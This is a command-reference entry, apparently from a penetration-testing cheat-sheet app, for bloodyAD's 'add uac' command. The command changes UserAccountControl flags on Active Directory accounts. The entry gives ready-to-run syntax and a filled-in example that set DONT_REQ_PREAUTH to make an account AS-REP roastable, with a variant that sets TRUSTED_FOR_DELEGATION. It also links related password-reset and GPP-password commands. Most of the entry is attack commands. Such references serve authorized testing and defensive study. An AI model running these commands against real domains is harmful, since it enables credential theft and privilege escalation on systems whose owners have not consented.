bloodyAD add uac
Toggle UserAccountControl flags on a target account. Setting DONT_REQ_PREAUTH on a user you control (via writeAccountRestrictions) makes them AS-REP roastable on demand. Other useful flags: TRUSTED_FOR_DELEGATION, ACCOUNTDISABLE.
- Tool
- bloodyAD
- Category
- Credential Attacks / Password Manipulation
- Platform
- linux
- Requires
- password
- Protocols
- LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
bloodyAD --host <dc-ip> -d '<domain>' -u '<user>' -p '<password>' add uac '<target>' -f DONT_REQ_PREAUTH
Credential variants
The same attack using a different authentication material.
Remove Flag requires password
bloodyAD --host <dc-ip> -d '<domain>' -u '<user>' -p '<password>' remove uac '<target>' -f DONT_REQ_PREAUTH
Unconstrained Delegation requires password
bloodyAD --host <dc-ip> -d '<domain>' -u '<user>' -p '<password>' add uac '<target>' -f TRUSTED_FOR_DELEGATION
Examples
bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' add uac svc_app -f DONT_REQ_PREAUTH
Tags
Related commands
- BloodyAD Force Password Change Force password change using BloodyAD
- bloodyAD Set Password Reset another user's password if you have ForceChangePassword…
- Impacket changepasswd Change an AD user's password via RPC (requires appropriate ACL rights)
- Impacket Get-GPPPassword Decrypt Group Policy Preference (GPP) passwords from XML files
- Net RPC Password Change Force password change via Net RPC
- NetExec change-password Module Reset a user's password when they are flagged STATUS_PASSWORD_MUST_CHANGE — typical…
- NetExec SMB GPP AutoLogin Search Group Policy Preferences for AutoLogon credentials stored in SYSVOL
- NetExec SMB GPP Password Search SYSVOL for Group Policy Preference XML files containing encrypted passwords